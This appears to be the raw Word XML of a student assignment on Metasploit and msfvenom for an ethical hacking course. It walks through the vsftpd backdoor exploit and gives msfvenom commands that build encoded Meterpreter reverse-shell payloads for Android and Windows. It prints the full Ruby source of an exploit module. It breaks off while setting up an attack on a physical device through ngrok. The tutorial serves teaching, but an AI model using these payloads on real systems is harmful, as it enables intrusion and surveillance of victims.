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7.png" ContentType="image/png"/>
  <Override PartName="/word/media/image16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3.png" ContentType="image/png"/>
  <Override PartName="/word/media/image12.png" ContentType="image/png"/>
  <Override PartName="/word/media/image18.png" ContentType="image/png"/>
  <Override PartName="/word/media/image20.png" ContentType="image/png"/>
  <Override PartName="/word/media/image9.png" ContentType="image/png"/>
  <Override PartName="/word/media/image4.png" ContentType="image/png"/>
  <Override PartName="/word/media/image13.png" ContentType="image/png"/>
  <Override PartName="/word/media/image30.png" ContentType="image/png"/>
  <Override PartName="/word/media/image28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jpeg" ContentType="image/jpe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ind w:right="2512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margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-795655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2169160" cy="2169160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1" name="Picture 1" descr="A logo with a person in a hoodie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with a person in a hoodie using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16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right="2512"/>
        <w:jc w:val="center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56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="56"/>
        </w:rPr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4472C4"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>MISSION HACKERS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>BANGLADESH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56"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Assignment No-08  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="10"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="10"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"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 xml:space="preserve">Assignment Title: Introduction to Exploitation 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 xml:space="preserve">Course Title: Cybersecurity &amp; Ethical Hacking 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  <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="8"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing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by: 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Name: Istiak Alam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Phone: 01765376101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="156"/>
        <w:ind w:hanging="10" w:left="-5"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Submission Date: 06-08-25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="10"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools / Topic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit-Framework &amp; Msfvenom </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="1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                               </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="10" w:left="-5"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496"/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitted to: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MD Sha Jalal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Founder of Mission Hackers Bangladesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:ind w:hanging="10" w:left="-5"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/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Part-01 Introduction to Metasploit Framework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/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="auto" w:line="240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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Metasploit Framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an open-source penetration testing platform that allows  to find, exploit, and validate vulnerabilities in systems. It's like a “hacker's Swiss Army knife” used by Cybersecurity professionals to test network and system defenses.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  <w:t xml:space="preserve">🔑 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Key Concepts</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8388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842"/>
        <w:gridCol w:w="7545"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="842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Term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Heading"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Meaning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Exploit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Code that takes advantage of a vulnerability.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Payload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Code that runs on the target after exploitation (e.g., a reverse shell).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Listener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The attacker’s machine that waits for the payload to connect back.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Module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A script/plugin in Metasploit. Can be exploits, scanners, payloads, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="842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trong"/>
              </w:rPr>
              <w:t>Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7545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/>
              <w:t>A communication link between attacker and victim (e.g., Meterpreter).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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  <w:t xml:space="preserve">🔧 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Let’s Start Metasploit on Kali Linux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Style w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Start PostgreSQL (Metasploit uses it)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="283"/>
        <w:ind w:hanging="0" w:left="0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sudo systemctl start postgresql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Style w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Launch Metasploit Console</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="283"/>
        <w:ind w:hanging="0" w:left="0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msfconsole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  <w:t xml:space="preserve">🎯 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Common Metasploit Commands</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5863" w:type="dxa"/>
        <w:jc w:val="left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233"/>
        <w:gridCol w:w="3629"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2233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Command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/>
              <w:t>Description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search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Search for exploit modules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use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Select a specific module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show options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View required options for a module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set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Set parameters like RHOST, LHOST, etc.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exploit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Run the exploit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sessions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 active sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2233" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>sessions -i &lt;ID&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3629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Interact with a session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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  <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Example: Exploiting vsftpd 2.3.4 (Backdoor vulnerability)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1: Start Metasploit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msfconsole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2: Search the exploit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search vsftpd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3: Use the module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use exploit/unix/ftp/vsftpd_234_backdoor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4: Set target IP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set RHOSTS &lt;target-ip&gt;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 w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step 5: Run the exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="283"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>exploit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we’ll get a shell if it’s successful!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 w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="283"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Part-02 Finding Meterpreter / Payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an advanced, stealthy payload that gives a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>reverse shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target system. With Meterpreter we can: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Browse the target file system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Capture screenshots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Download/upload files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Open a keylogger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Record microphone audio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0"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Heading2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  <w:t xml:space="preserve">Let’s See some Demonstration : </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="283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1 : Start Metasploit-Framework [msfconsole]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1045" cy="480123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4801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36"/>
          <w:szCs w:val="36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2 : type command – ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>help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’ to get the Metasploit manual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582739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5827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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1645920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="432943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2754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329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3 : Search any payload using show and search command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322199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4 : Search for Meterpreter reverse shell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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>129540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="322008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0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then, here is the list of Meterpreter reverse shell payloads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5 : Search for windows/meterpreter/reverse_tcp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324485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4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if we want to use any payloads then we have to use the payload id’s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use [ID]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6 : Use the reverse_tcp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160972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7 : Setup the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>LHOST (Your IP) and LPORT (4444)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3810" cy="182118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82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Same as we can Search and use payloads for android system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259207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259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8 : We can see the auxiliary files [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>show auxiliary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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>68580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="295846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295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bidi w:val="0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Find a trial demo payload : </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Open virtual machine and start Metaspoitable2-linux </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Start nmap and scan the Metaspoitable2 IP address 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0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2435" cy="313055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Search for the ftp service version and the payloads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0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2435" cy="130429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130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We can search payload using the Vulnerabilities Scanned by Nmap. And exploit them...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9 : We can Search and show encoders using the command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Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>show encoders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323342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3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10 :  We can Search and show auxiliary using the command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show auxiliary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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>106680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="324612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4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>Part-03 Generating Payload using msfvenom</w:t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/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:ind w:hanging="10" w:left="-5"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId17">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>read more...</w:t>
        </w:r>
      </w:hyperlink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 : Open terminal and see the manual of msfvenom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msfvenom -help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-175260</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>91440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6082030" cy="276161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2761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2 : Run Metasploit-framework and msfvenom in terminal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3 : Search for any payload such as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android/meterpreter/reverse_tcp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4 : Show the available options </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[show options]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302895</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>68580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5125720" cy="2873375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20" cy="287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5 : Now Generate payload using msfvenom and fulfill the required port and host -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msfvenom -p android/meterpreter/reverse_tcp LHOST=&lt;yourIP&gt; LPORT=4444 -e encoder/x86/shikata_ga_nai -i 5 -o payload.apk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-316865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>267970</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6528435" cy="3668395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366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Explanation :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msfvenom : Generate payload for android / windows / unix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-p : Generate payload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LHOST : set lhost with device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LPORT : set lport with device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-e : set encoders for detect as normal program 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-i : set iteration number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-o : Generate output as the given name.apk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LHOST must be a public IP…!! For demonstration we have used private IP of our wlan0 / eth0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Same as we can Generate Payload for windows….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 : In the metasploit-framework search for windows payloads meterpreter/reverse_tcp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search windows/meterpreter/reverse_tcp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-156845</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>123190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6389370" cy="164655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60646" r="0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164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2 : Use the payload then show the requirements and options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3 : Now Generate payload using msfvenom and fulfill the required port and host -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:ind w:hanging="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msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;yourIP&gt; LPORT=4444 -e encoder/x86/shikata_ga_nai -i 5 -o payload.exe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-318135</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>146050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6367780" cy="358013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780" cy="3580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Our payload for windows is here ….!!!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t>Part-03 Practical Operation using Metasploit-Framwork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18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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We should Study about all the payloads and getting Idea how payload works and how to create them..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3342640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34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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3078480</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="1534160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53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we can see the payload codes in rubi language using cat command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cat energizer_duo_payload.rb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##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This module requires Metasploit: https://metasploit.com/download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Current source: https://github.com/rapid7/metasploit-framework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##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class MetasploitModule &lt; Msf::Exploit::Remote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Rank = ExcellentRanking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include Msf::Exploit::Remote::Tcp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include Msf::Exploit::EXE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def initialize(info = {})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super(update_info(info,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'Name'           =&gt; 'Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution',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'Description'    =&gt; %q{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This module will execute an arbitrary payload against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any system infected with the Arugizer trojan horse. This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backdoor was shipped with the software package accompanying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the Energizer DUO USB battery charger.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},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'Author'         =&gt; [ 'hdm' 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'License'        =&gt; MSF_LICENSE,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'References'     =&gt;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['CVE', '2010-0103'],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['OSVDB', '62782'],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['US-CERT-VU', '154421']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'Platform'       =&gt; 'win',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'Targets'        =&gt;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 'Automatic', { } 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],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'DefaultTarget'  =&gt; 0,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'DisclosureDate' =&gt; '2010-03-05'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register_options(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Opt::RPORT(7777),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])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def trojan_encode(str)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str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")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def trojan_command(cmd)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case cmd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:exec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"{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"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:dir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"{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"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:write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"{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"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:read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"{F6C43E1A-1551-4000-A483-C361969AEC41}"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:nop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"{783EACBF-EF8B-498e-A059-F0B5BD12641E}"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:find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"{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"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:yes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"{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"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:runonce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"{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"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when :delete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cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"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trojan_encode(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[cid.length + 1].pack("V") + cid  + "\x00"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def exploit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nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"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exe = generate_payload_exe + "\x00"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print_status("Trying to upload #{nam}...")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connect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Write file request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sock.put(trojan_command(:write))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sock.put(trojan_encode([nam.length].pack("V")))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sock.put(trojan_encode(nam))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sock.put(trojan_encode([exe.length].pack("V")))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sock.put(trojan_encode(exe))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Required to prevent the server from spinning a loop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sock.put(trojan_command(:nop))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disconnect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Execute the payload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print_status("Trying to execute #{nam}...")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connect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Execute file request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sock.put(trojan_command(:exec))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sock.put(trojan_encode([nam.length].pack("V")))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sock.put(trojan_encode(nam))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# Required to prevent the server from spinning a loop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sock.put(trojan_command(:nop))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disconnect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 xml:space="preserve">  </w:t>
      </w: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21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t>end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Hack" w:hAnsi="Hack"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                                      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And we can read the code, edit it and understand how a payloads works… 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Lets create a payload and attack a Physical Device :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20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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 : For public IP we can use ngrok for port &amp; IP forwarding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ngrok http://localhost:8000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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>91440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="2684145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268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Then we will get a public IP i.e. : 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https://b26a127a3292.ngrok-free.app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2 : Open another Terminal &amp; run the Metasploit-framework and Search for windows/meterpreter/reverse_tcp. Also split the terminal in two section by using ctrl+shift+R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-193675</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>175260</wp:posOffset>
            </wp:positionV>
